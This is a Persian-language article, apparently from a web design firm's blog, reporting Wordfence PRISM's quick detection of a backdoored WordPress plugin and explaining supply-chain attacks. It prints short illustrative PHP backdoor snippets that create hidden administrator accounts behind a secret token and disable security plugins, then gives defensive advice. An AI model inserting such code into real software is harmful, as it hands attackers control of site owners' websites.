Wordfence در کمتر از دو ساعت یک بک‌دور خطرناک در افزونه وردپرس را شناسایی کرد

سیستم امنیتی PRISM شرکت Wordfence موفق شد یک افزونه وردپرس آلوده به بک‌دور را تنها کمتر از دو ساعت پس از ورود کد مخرب شناسایی کند. این رخداد نمونه‌ای از افزایش حملات زنجیره تأمین در اکوسیستم وردپرس است که در آن مهاجمان به جای هدف قرار دادن مستقیم سایت‌ها، کد مخرب را از طریق افزونه‌های مورد اعتماد وارد می‌کنند.

این حادثه نشان می‌دهد ابزارهای مبتنی بر هوش مصنوعی می‌توانند زمان شناسایی تهدیدهای امنیتی را کاهش دهند و پیش از گسترش یک حمله، هشدارهای لازم را در اختیار تیم‌های امنیتی قرار دهند.

شناسایی یک افزونه آلوده وردپرس توسط Wordfence PRISM

وردپرس به دلیل استفاده گسترده از افزونه‌های شخص ثالث، همواره یکی از اهداف مهم مهاجمان سایبری بوده است. بسیاری از حملات گذشته از طریق آسیب‌پذیری‌های موجود در افزونه‌ها انجام شده‌اند، اما در سال‌های اخیر روش‌های پیچیده‌تری مانند حملات زنجیره تأمین افزایش پیدا کرده‌اند.

در جدیدترین گزارش Wordfence، سیستم PRISM این شرکت توانست یک افزونه وردپرس را که به‌صورت عمدی با کد مخرب آلوده شده بود، تنها دو ساعت پس از انتشار تغییرات شناسایی کند.

در این نوع حملات، توسعه‌دهنده یا منبع انتشار افزونه به نقطه‌ای برای ورود بدافزار تبدیل می‌شود. کاربر تصور می‌کند در حال دریافت یک به‌روزرسانی معمولی است، اما نسخه جدید می‌تواند شامل مسیر مخفی برای دسترسی مهاجم باشد.

حمله زنجیره تأمین چگونه عمل می‌کند؟

در حملات معمولی، مهاجم معمولا یک ضعف امنیتی در سایت یا نرم‌افزار پیدا می‌کند و از همان مسیر وارد سیستم می‌شود. اما در حملات زنجیره تأمین، هدف اصلی زیرساختی است که کاربران به آن اعتماد دارند.

در اکوسیستم وردپرس، این زنجیره می‌تواند شامل موارد زیر باشد:

  • حساب توسعه‌دهنده افزونه
  • مخزن انتشار افزونه
  • فرآیند به‌روزرسانی خودکار وردپرس
  • فایل‌های کد افزونه

اگر مهاجم بتواند یکی از این بخش‌ها را کنترل کند، نسخه آلوده می‌تواند بدون جلب توجه تعداد زیادی از سایت‌ها را تحت تأثیر قرار دهد.

تحلیل فنی بک‌دور افزونه وردپرس

بررسی‌های امنیتی نشان داد کد مخرب افزونه با هدف ایجاد دسترسی غیرمجاز طراحی شده بود. چنین بک‌دورهایی معمولا تلاش می‌کنند بدون نیاز به ورود کاربر، سطح دسترسی مدیر سایت را برای مهاجم فراهم کنند.

یکی از روش‌های رایج در این حملات، ایجاد حساب کاربری مدیریتی مخفی است. ساختار ساده چنین عملکردی می‌تواند مشابه نمونه زیر باشد:

if (isset($_REQUEST['token']) && $_REQUEST['token'] === 'SECRET_TOKEN') {

    $user_id = wp_create_user(
        'new_admin',
        'password123',
        'admin@example.com'
    );

    $user = new WP_User($user_id);
    $user->set_role('administrator');
}

این کد نمونه نشان می‌دهد یک مهاجم چگونه می‌تواند از توابع داخلی وردپرس برای ایجاد یک کاربر جدید با سطح دسترسی مدیر استفاده کند.

در حملات واقعی، مهاجمان معمولا این منطق را با روش‌های مختلف مخفی‌سازی ترکیب می‌کنند تا بررسی دستی فایل‌ها دشوارتر شود.

ایجاد حساب مدیر جعلی و کنترل کامل سایت

یکی از خطرناک‌ترین قابلیت‌های بک‌دورهای وردپرسی، امکان ساخت حساب مدیریتی بدون اطلاع مالک سایت است.

نمونه ساده‌ای از این رفتار:

$new_user = wp_insert_user([
    'user_login' => 'support_admin',
    'user_pass'  => 'temporary_password',
    'role'       => 'administrator'
]);

پس از ایجاد چنین حسابی، مهاجم می‌تواند وارد پیشخوان وردپرس شود و اقداماتی مانند تغییر محتوا، نصب افزونه‌های مخرب، سرقت اطلاعات یا ایجاد لینک‌های اسپم برای دستکاری رتبه سایت در موتورهای جستجو را انجام دهد.

امکان اجرای دستورات از راه دور

برخی بک‌دورها علاوه بر ایجاد کاربر مدیر، قابلیت کنترل بخش‌های مختلف سایت را نیز فراهم می‌کنند. برای مثال مهاجم ممکن است تلاش کند افزونه‌های امنیتی را غیرفعال کند یا یک افزونه مخرب دیگر را فعال نگه دارد.

نمونه ساده این رفتار:

activate_plugin('malicious-plugin/plugin.php');

deactivate_plugins('security-plugin/security.php');

در نمونه‌های واقعی، این دستورات معمولا به شکل پیچیده‌تر و همراه با روش‌های پنهان‌سازی اجرا می‌شوند.

PRISM چگونه توانست تهدید را سریع شناسایی کند؟

PRISM یک سیستم تحلیل امنیتی مبتنی بر هوش مصنوعی است که برای بررسی کدهای وردپرس، شناسایی تغییرات مشکوک و تحلیل رفتار افزونه‌ها توسعه یافته است.

تفاوت اصلی چنین سیستم‌هایی با روش‌های سنتی، سرعت بررسی آن‌ها است. در گذشته ممکن بود یک افزونه آلوده مدت زیادی در دسترس کاربران باقی بماند تا زمانی که محققان امنیتی یا کاربران متوجه رفتار غیرعادی شوند.

اما در این حادثه، PRISM توانست مدت کوتاهی پس از اضافه شدن کد مخرب، نشانه‌های غیرطبیعی را تشخیص دهد و فرآیند بررسی امنیتی را آغاز کند.

چرا بک‌دورهای وردپرس خطرناک هستند؟

وجود یک بک‌دور در افزونه می‌تواند پیامدهای گسترده‌ای برای یک سایت داشته باشد. مهاجم پس از ورود می‌تواند:

  • حساب‌های مدیریتی جعلی ایجاد کند
  • اطلاعات کاربران را سرقت کند
  • فایل‌های سایت را تغییر دهد
  • کدهای مخرب به صفحات اضافه کند
  • لینک‌های اسپم برای حملات سئو ایجاد کند
  • بدافزارهای دیگر روی سرور نصب کند

برای سایت‌های تجاری، چنین حملاتی علاوه بر خسارت فنی می‌توانند باعث کاهش رتبه در موتورهای جستجو و از دست رفتن اعتماد کاربران شوند.

چگونه مدیران وردپرس از سایت خود محافظت کنند؟

برای کاهش خطر حملات مشابه، مدیران سایت‌های وردپرسی باید فرآیند امنیتی منظم داشته باشند.

بررسی کاربران مدیر یکی از اولین اقدام‌ها است. وجود یک حساب مدیریتی ناشناس می‌تواند نشانه نفوذ باشد.

همچنین بهتر است:

  • افزونه‌ها فقط از منابع معتبر دریافت شوند
  • افزونه‌های بلااستفاده حذف شوند
  • قبل از نصب نسخه‌های جدید، تغییرات آن‌ها بررسی شود
  • از ابزارهای اسکن امنیتی مانند Wordfence استفاده شود
  • احراز هویت دومرحله‌ای برای حساب‌های مدیریتی فعال شود
  • نسخه پشتیبان منظم از فایل‌ها و دیتابیس تهیه شود

برای بررسی فایل‌های مشکوک نیز می‌توان تغییرات غیرعادی در فایل‌های PHP افزونه‌ها را بررسی کرد. فایل‌هایی که به‌تازگی تغییر کرده‌اند یا شامل توابعی مانند eval، base64_decode و اجرای دستورات غیرمعمول هستند، نیاز به بررسی دقیق دارند.

هوش مصنوعی مسیر امنیت وردپرس را تغییر می‌دهد

افزایش حملات پیچیده علیه افزونه‌های وردپرس نشان می‌دهد روش‌های سنتی مقابله با تهدیدها دیگر کافی نیستند. سیستم‌هایی مانند PRISM تلاش می‌کنند با تحلیل سریع کد و رفتار نرم‌افزار، تهدیدها را پیش از گسترش شناسایی کنند.

کشف یک بک‌دور تنها در مدت کمتر از دو ساعت نشان می‌دهد سرعت واکنش در امنیت سایبری اهمیت زیادی دارد. برای میلیون‌ها سایت وردپرسی، فاصله میان انتشار یک نسخه آلوده و شناسایی آن می‌تواند تفاوت میان یک حادثه محدود و یک حمله گسترده باشد.

دیدگاهتان را بنویسید!

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

طرح پردازان مگین
سبد خرید
empty basket

هیچ محصولی در سبد خرید نیست.